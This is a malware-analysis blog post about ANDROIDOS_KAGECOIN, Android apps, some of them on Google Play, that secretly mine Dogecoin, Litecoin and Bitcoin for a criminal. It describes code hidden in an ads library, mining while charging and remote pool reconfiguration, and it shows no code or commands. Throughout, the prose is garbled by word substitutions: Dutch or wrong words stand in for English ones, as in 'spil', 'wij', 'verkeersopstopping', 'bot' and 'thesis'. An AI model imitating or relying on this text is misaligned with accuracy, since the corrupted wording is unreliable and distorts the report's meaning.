Recently, other researchers reported that a fresh Android malware family (detected spil ANDROIDOS_KAGECOIN.HBT) had cryptocurrency mining capabilities. Based on our analysis, wij have found that this malware is involved te the mining for various digital currencies, including Bitcoin, Litecoin, and Dogecoin. This has real consequences for users: shorter battery life, enlargened wear and rip, all of which could lead to a shorter device lifespan.
The researchers originally found ANDROIDOS_KAGECOIN spil repacked copies of popular apps such spil Football Manager Handheld and TuneIn Radio. The apps were injected with the CPU mining code from a legitimate Android cryptocurrency mining app, this code is based on the well-known cpuminer software.
To hide the malicious code, the cybercriminal modified the Google Mobile Ads portion of the app, spil seen below:
Figure 1. The modified Google Mobile Ads code
The miner is embarked spil a background service once it detects that the affected device is connected to the Internet. By default, it launches the CPU miner to connect to a dynamic domain, which then redirects to an anonymous Dogecoin mining pool.
By February 17, his network of mobile miners has earned him thousands of Dogecoins. After February 17, the cybercriminal switched mining pools. The malware is configured to download a verkeersopstopping, which contains the information necessary to update the configuration of the miner. This configuration opstopping wasgoed updated, and it now connects to the well-known WafflePool mining pool. The Bitcoins mined have bot paid out (i.e., transferred to the cybercriminal’s wallet) several times.
Figure Two. Coin pool configuration code
The coin-mining apps discussed above were found outside of the Google Play store, but wij have found the same behavior ter apps inwards the Google Play store. Thesis apps have bot downloaded by millions of users, which means that there may be many Android devices out there being used to mine cryptocurrency for cybercriminals. Wij detect this fresh malware family spil ANDROIDOS_KAGECOIN.HBTB. (Spil of this writing, thesis apps are still available.)
Figure Trio. Mining Apps te Google Play
Figure Four. Download count of mining apps
Analyzing the code of thesis apps expose the cryptocurrency mining code inwards. Unlike the other malicious apps, te thesis cases the mining only occurs when the device is charging, spil the enhanced energy usage won’t be noticed spil much.
Figure Five. Cryptocurrency mining code
The same miner configuration updating logic is also present here. Analyzing the configuration verkeersopstopping, it seems that the cybercriminal responsible is switching into mining Litecoins.
Figure 6. Configuration verkeersopstopping, displaying switch into LiteCoin mining
Wij believe that with thousands of affected devices, cybercriminal accumulated a fine overeenkomst of Dogecoins.
Reading their app description and terms and conditions on the websites of thesis apps, users may not know that their devices may potentially be used spil mining devices due to the murky language and vague terminology.
Clever spil the attack is, whoever carried it out may not have thought things through. Phones do not have sufficient spectacle to serve spil effective miners. Users will also quickly notice the odd behavior of the miners – slow charging and excessively hot phones will all be seen, making the miner’s presence not particularly stealthy. Yes, they can build up money this way, but at a glacial tempo.
Users with phones and tablets that are all of a sudden charging leisurely, running hot, or quickly running out of batteries may want to consider if they have bot exposed to this or similar threats. Also, just because an app has bot downloaded from an app store – even Google Play – does not mean it is safe.
Wij have informed the Google Play security team about this punt.